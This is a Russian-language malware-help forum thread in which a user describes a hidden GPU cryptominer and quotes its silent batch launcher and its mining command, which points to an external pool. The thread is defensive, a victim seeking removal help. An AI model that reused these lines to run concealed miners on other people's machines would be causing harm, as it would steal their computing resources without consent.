-
Junior Member
- Вес репутации
- 37
Вирус - майнинг на чужой видеокарте. Нагрузка GPU в простое...
Появился вирус нагружающий GPU. Через Process Explorer нашел путь до исполняемых файлов: "c:\Windows\API\". В нем очень много файлов. Но вот главные из них:
- 1.bat
Код:
hstart.exe /NOCONSOLE /SILENT "C:\Windows\API\Lark.bat"
- Lark.bat
Код:
systems --keccak -o http://pool.flylark.net:8332 -u admin.windows -p microsoft -w 32
Понятно, что на мне майнят на пулле [удалено]. Похожий вирус я уже находил, и удалил его из %AppData%/Roaming/*****/*****.js - файл формата JavaScript, который и создавал исполняемый файл для запуска.
Сейчас же я не могу его найти. Помогите пожалуйста, как можно определить откуда он создается?
PS: после удаления папки "c:\Windows\API\" и перезагрузке системы все файлы пересоздаются.
Последний раз редактировалось thyrex; 14.04.2014 в 20:32.
-
Будь в курсе!
Будь в курсе!
Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:
-
Уважаемый(ая) DarkSector, спасибо за обращение на наш форум!
Удаление вирусов - абсолютно бесплатная услуга на VirusInfo.Info. Хелперы, в самое ближайшее время, ответят на Ваш запрос. Для оказания помощи необходимо предоставить логи сканирования утилитами АВЗ и HiJackThis, подробнее можно прочитать в правилах оформления запроса о помощи.
Если наш сайт окажется полезен Вам и у Вас будет такая возможность - пожалуйста поддержите проект.
-
-
Junior Member
- Вес репутации
- 37
Авто распаковщик был найден в "Автозагрузке". После удаления мучение мое прекратилось.